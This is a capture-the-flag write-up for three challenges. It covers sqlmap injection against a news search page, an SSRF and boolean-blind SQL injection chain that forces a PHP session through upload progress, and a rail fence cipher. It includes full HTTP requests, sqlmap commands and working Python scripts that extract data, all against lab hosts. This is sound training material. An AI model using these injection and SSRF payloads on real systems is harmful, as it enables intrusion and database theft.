2025 磐石行动 Week 7 Writeup
1、Baiyun News Search (白云新闻搜索)
Another search giant has appeared in China! Reportedly, internet tycoon Xiao Ming recently wrote a search engine called Baiyun News Search; the link is below. The search is clunky and the interface is weak, so Xiao Ming is offering a bag of latiao as a bounty for vulnerabilities and dares all the intrusion experts to have a go. Convinced? If not, go try it~ (The answer is in the form flag{}; submit only the content inside the braces.)
The challenge page looks like this:
First, consider where the content shown below the search box comes from. It is identical on every request, so it is not search output but rows read from a database.
Capture the request with Burp:
```http
POST / HTTP/1.1
Host: 192.168.0.10:10008
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: _identity=91a60559f578fa288bb633d808687c92e4d696eff3932eb26a463471d2e7fe15a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A28%3A%22%5B%22100%22%2C%22test100key%22%2C2592000%5D%22%3B%7D
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

word=%E5%86%85%E5%AE%B9*&number=1*
```
Append `*` after each parameter value to mark it as a candidate injection point, save the request to a file and hand it to sqlmap. sqlmap reports that `word` is injectable.
```
python3 .\sqlmap.py -r .\1.txt --current-db
python3 .\sqlmap.py -r .\1.txt -D news --tables
python3 .\sqlmap.py -r .\1.txt -D news -T admin --dump
```
The last command dumps the `admin` table:
```
+----------------------------------------+----------+
| flag                                   | username |
+----------------------------------------+----------+
| flag{fabbf4abe040f2fdac8234099facdccb} | admin    |
+----------------------------------------+----------+
```
The flag:
flag{fabbf4abe040f2fdac8234099facdccb}
2、ez_login
I know u know it
Visiting the challenge shows its source:
```php
<?php
if(!isset($_SESSION)){
    highlight_file(__FILE__);
    die("no session");
}
include("./php/check_ip.php");
error_reporting(0);
$url = $_GET['url'];
if(check_inner_ip($url)){
    if($url){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
        $output = curl_exec($ch);
        $result_info = curl_getinfo($ch);
        curl_close($ch);
    }
}else{
    echo "Your IP is internal yoyoyo";
}
?>
```
dirsearch finds admin.php.
Visiting it directly only returns a message that it can be accessed locally only.
Combined with the source above, this means we need SSRF. The first problem is how to get past this check:
```php
if(!isset($_SESSION)){highlight_file(__FILE__);die("no session");
}
```
The first attempt was to forge the session directly in the HTTP header:
```
Cookie: PHPSESSID=your_session_id
```
That still fails. It turned out the session has to be started first:
- `session_start()` must have been called before `$_SESSION` is used.
- Validate the session contents, e.g. check whether a specific session variable exists or matches expectations.
Asking the AI further gave the following approach:
1、Using PHP_SESSION_UPLOAD_PROGRESS to trigger session_start()
(1) Confirm the environment supports it
First confirm that the target server has the session.upload_progress feature enabled. It can be verified as follows:
- Check the phpinfo() output and confirm that session.upload_progress.enabled is On.
- By default this feature is usually enabled.
(2) Construct a file upload request
Sending a file upload request that carries a PHP_SESSION_UPLOAD_PROGRESS field triggers session initialization. The concrete steps:
Request example
```http
POST /upload.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Cookie: PHPSESSID=your_session_id

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

This is a test file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--
```
Key points
- The PHP_SESSION_UPLOAD_PROGRESS field is what triggers the session.
- The PHPSESSID cookie must be set to the session ID you want to use.
- The file content can be arbitrary data.
Then build the request with the payload above.
The response changes. Comparing with the source, this is the internal-IP check rejecting the address, so change it to localhost and try again:
```http
POST /?url=http://localhost/admin.php HTTP/1.1
Host: 192.168.0.10:10009
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Cookie: PHPSESSID=your_session_id
Content-Length: 316

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

This is a test file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--
```
The response changes again, and a comment in it reveals a zip archive. Using the Burp plugin, export the request as Python code and fetch the archive through the SSRF:
```python
import requests

session = requests.Session()
# The archive is only reachable from localhost, so it is fetched through the SSRF endpoint.
paramsGet = {"url": "http://localhost/yuanma_f0r_eAZy_logon.zip"}
# PHP_SESSION_UPLOAD_PROGRESS plus a file upload makes PHP start the session,
# which satisfies the isset($_SESSION) check.
paramsPost = {"PHP_SESSION_UPLOAD_PROGRESS": "12345"}
paramsMultipart = [('file', ('test.txt', "This is a test file.", 'application/octet-stream'))]
cookies = {"PHPSESSID": "your_session_id"}
response = session.post("http://192.168.0.10:10009/", data=paramsPost, files=paramsMultipart, params=paramsGet, cookies=cookies)
print("Status code: %i" % response.status_code)
print("Response body: %s" % response.content)
# The body is the zip archive itself (CURLOPT_RETURNTRANSFER is 0, so curl_exec prints it).
with open("yuanma_f0r_eAZy_logon.zip", "wb") as f:
    f.write(response.content)
```
From the archive we get the source of se1f_Log3n.php:
```php
<?php
include("./php/db.php");
include("./php/check_ip.php");
error_reporting(E_ALL);
$ip = $_SERVER["REMOTE_ADDR"];
if($ip !== "127.0.0.1"){
    exit();
}else{
    try{
        $sql = 'SELECT `username`,`password` FROM `user` WHERE `username`= "'.$username.'" and `password`="'.$password.'";';
        $result = $con->query($sql);
        echo $sql;
    }catch(Exception $e){
        echo $e->getMessage();
    }
    ($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND die("error")) OR ( ($con->close() AND die('Try again!') ));
}
```
The SQL statement is built by direct string concatenation:
```php
$sql = 'SELECT `username`,`password` FROM `user` WHERE `username`= "'.$username.'" and `password`="'.$password.'";';
```
So consider SQL injection. Sending a universal-password style payload gives the response below. Note that `#` and `&` must be URL-encoded twice (`%2523`, `%2526`): the outer script decodes the `url` parameter once before handing it to curl, so a single-encoded `&` would be treated as a separator of the outer query string and the parameter would never reach the inner request, and a bare `#` would be treated by curl as a URL fragment and dropped.
```http
POST /?url=http://localhost/se1f_Log3n.php?username=admin'%20and%201%2523%2526password=1 HTTP/1.1
Host: 192.168.0.10:10009
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Cookie: PHPSESSID=your_session_id
Content-Length: 316

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

12345
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

This is a test file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--
```
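The two encoding layers in the request above, as an added example that is not part of the writeup: it models offline how the outer script's `$_GET`, curl's URL handling and the inner script's `$_GET` each see the payload, using the hosts and script name from the writeup. The modelling assumptions are that PHP splits a query string on `&` before percent-decoding each pair once, and that curl sends nothing after a bare `#`. It also shows the general construction, quoting the whole inner URL once more rather than hand-placing `%25` sequences, and contrasts it with a single-encoded request.

```python
from urllib.parse import quote, urlsplit, parse_qsl

# Hosts as used in the writeup; nothing is contacted, the decoding is modelled locally.
SSRF_ENDPOINT = "http://192.168.0.10:10009/"
INNER_SCRIPT = "http://localhost/se1f_Log3n.php"


def inner_url(params: dict) -> str:
    """Layer 1: the URL curl should fetch on the target's behalf.
    Structural '&' and '=' stay raw; payload bytes ('#', quotes, spaces, '&') are encoded once."""
    query = "&".join(f"{k}={quote(v, safe='')}" for k, v in params.items())
    return f"{INNER_SCRIPT}?{query}"


def outer_url(params: dict) -> str:
    """Layer 2: wrap the whole inner URL as the ?url= value of the SSRF endpoint.
    This is the second round of encoding for the payload bytes (e.g. '#' -> %23 -> %2523)."""
    return f"{SSRF_ENDPOINT}?url={quote(inner_url(params), safe='')}"


def model_server(outer: str):
    """Model what the two PHP scripts see (assumption: PHP splits a query string on '&'
    first, then percent-decodes each pair exactly once).
    1. The outer script builds $_GET from its query string and passes $_GET['url'] to curl.
    2. curl treats anything after a bare '#' as a fragment and never sends it.
    3. The inner script builds its own $_GET from the query it actually receives.
    Returns (outer $_GET, fragment curl would drop, inner $_GET)."""
    outer_get = dict(parse_qsl(urlsplit(outer).query, keep_blank_values=True))
    fetched = urlsplit(outer_get.get("url", ""))
    inner_get = dict(parse_qsl(fetched.query, keep_blank_values=True))
    return outer_get, fetched.fragment, inner_get


# Constructed payload: the "true" probe from the writeup.
PAYLOAD = {"username": "admin' and if(1=1,1,0)#", "password": "1"}

# Correctly layered: '#' is %2523 on the wire, %23 when curl sees it, '#' at the inner script.
GOOD = outer_url(PAYLOAD)

# Hand-written with a single round of encoding: the outer decode already turns %23 into a
# bare '#' (fragment) and would turn a single %26 into an outer-level separator.
BAD = (SSRF_ENDPOINT + "?url=" + INNER_SCRIPT
       + "?username=admin'%20and%20if(1=1,1,0)%23%26password=1")

if __name__ == "__main__":
    for label, u in (("double-encoded", GOOD), ("single-encoded", BAD)):
        outer_get, fragment, inner_get = model_server(u)
        print(label, "| outer params:", sorted(outer_get),
              "| dropped fragment:", repr(fragment), "| inner $_GET:", inner_get)
```

With the double-encoded request the inner script receives both `username` (comment marker intact) and `password`; with the single-encoded one the `#` becomes a fragment and everything after it, `password` included, never arrives.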
Probe with a false condition:
```http
POST /?url=http://localhost/se1f_Log3n.php?username=admin'%20and%20if(1=1,0,0)%2523%2526password=1
```
returns "wrong username or password", while a true condition:
```http
POST /?url=http://localhost/se1f_Log3n.php?username=admin'%20and%20if(1=1,1,0)%2523%2526password=1
```
returns "correct?".
So the truth of the condition is visible in the response, which gives boolean-based blind injection:
```python
import requests
import time

session = requests.Session()
# Same multipart body as before: PHP_SESSION_UPLOAD_PROGRESS plus a file upload makes PHP
# start the session, which satisfies the isset($_SESSION) check on the SSRF endpoint.
paramsPost = {"PHP_SESSION_UPLOAD_PROGRESS": "12345"}
paramsMultipart = [('file', ('test.txt', "This is a test file.", 'application/octet-stream'))]
cookies = {"PHPSESSID": "your_session_id"}

# Extraction was done in three rounds; the earlier expressions are kept as comments.
# 1. table names -> secret,users
#sql = "ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1))"
# 2. columns of secret -> flag
#sql = "ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='secret'),{index},1))"
# 3. the flag itself -> flag{3f2f5a67062d3ff56c6ace415d01d3f8}
sql = "ascii(substr((select flag from secret),{index},1))"

result = ""
for index in range(1, 100):
    sql_test = sql.format(index=index)
    # Binary search the ASCII value of the character at position `index`.
    head = 32
    tail = 127
    time.sleep(0.5)
    while head < tail:
        mid = (head + tail) >> 1
        # %23 (#) and %26 (&) are written once here; requests encodes the '%' a second time,
        # so after the outer script's decode curl still sees %23/%26 rather than a bare
        # '#' (fragment) or '&' (outer parameter separator).
        paramsGet = {"url": "http://localhost/se1f_Log3n.php?username=admin' and if({sql}>{test_ascii},1,0)%23%26password=1".format(sql=sql_test, test_ascii=mid)}
        response = session.post("http://192.168.0.10:10009/", data=paramsPost, files=paramsMultipart, params=paramsGet, cookies=cookies)
        if "correct" in response.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        # substr() past the end gives '', ascii('') is 0, so nothing above 32 matched: done.
        break
    print(result)
#flag{3f2f5a67062d3ff56c6ace415d01d3f8}
```
3、篱笆墙的影子 (Shadow of the Fence)
The challenge:
felhaagv{ewtehtehfilnakgw}
"篱笆墙" (fence) hints at a rail fence cipher.
The flag:
Decrypting with 13 columns gives flag{wethinkwehavetheflag}
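An added example, not part of the writeup, that decrypts the challenge ciphertext and brute-forces the key. Two things commonly called "rail fence" are implemented, because CTF tools disagree on the definition: the grouped variant (plaintext cut into chunks of N characters and read off column by column, which is the one the flag comes from with N = 13) and the classic W-shaped zigzag with N rails. The function names are this example's own.

```python
CIPHERTEXT = "felhaagv{ewtehtehfilnakgw}"   # ciphertext from the challenge


def fence_encrypt(plaintext: str, groups: int) -> str:
    """Grouped variant: split into chunks of `groups` characters, then emit the 1st
    character of every chunk, then the 2nd, and so on."""
    if len(plaintext) % groups:
        raise ValueError("length must be a multiple of the group size")
    chunks = [plaintext[i:i + groups] for i in range(0, len(plaintext), groups)]
    return "".join(chunk[c] for c in range(groups) for chunk in chunks)


def fence_decrypt(ciphertext: str, groups: int) -> str:
    """Inverse of fence_encrypt: the ciphertext is `groups` columns of `rows` characters,
    so read it back row by row."""
    if len(ciphertext) % groups:
        raise ValueError("length must be a multiple of the group size")
    rows = len(ciphertext) // groups
    cols = [ciphertext[i * rows:(i + 1) * rows] for i in range(groups)]
    return "".join(cols[c][r] for r in range(rows) for c in range(groups))


def _zigzag(n: int, rails: int) -> list:
    """Rail index of each position 0..n-1 in the W-shaped pattern."""
    pattern, r, step = [], 0, 1
    for _ in range(n):
        pattern.append(r)
        if rails > 1:
            if r == 0:
                step = 1
            elif r == rails - 1:
                step = -1
            r += step
    return pattern


def railfence_encrypt(plaintext: str, rails: int) -> str:
    """Classic variant: write in a zigzag over `rails` rows, read row by row."""
    pattern = _zigzag(len(plaintext), rails)
    order = sorted(range(len(plaintext)), key=pattern.__getitem__)  # stable: rail 0 first
    return "".join(plaintext[i] for i in order)


def railfence_decrypt(ciphertext: str, rails: int) -> str:
    """Rebuild the zigzag order, then drop ciphertext characters back into their positions."""
    pattern = _zigzag(len(ciphertext), rails)
    order = sorted(range(len(ciphertext)), key=pattern.__getitem__)
    plain = [""] * len(ciphertext)
    for ch, pos in zip(ciphertext, order):
        plain[pos] = ch
    return "".join(plain)


def brute_force(ciphertext: str) -> dict:
    """Try every key for both variants; returns {(variant, key): candidate plaintext}."""
    n = len(ciphertext)
    out = {}
    for k in range(2, n):
        if n % k == 0:                      # grouped variant needs an exact division
            out[("grouped", k)] = fence_decrypt(ciphertext, k)
        out[("zigzag", k)] = railfence_decrypt(ciphertext, k)
    return out


def find_flags(ciphertext: str, marker: str = "flag{") -> dict:
    """Keep only the candidates that look like a flag."""
    return {key: pt for key, pt in brute_force(ciphertext).items() if marker in pt}


if __name__ == "__main__":
    for key, pt in find_flags(CIPHERTEXT).items():
        print(key, pt)
```

Running it prints the single hit, `('grouped', 13) flag{wethinkwehavetheflag}`; the zigzag variant produces no flag-shaped candidate for this ciphertext, which is why the "13 columns" setting matters when using an online tool.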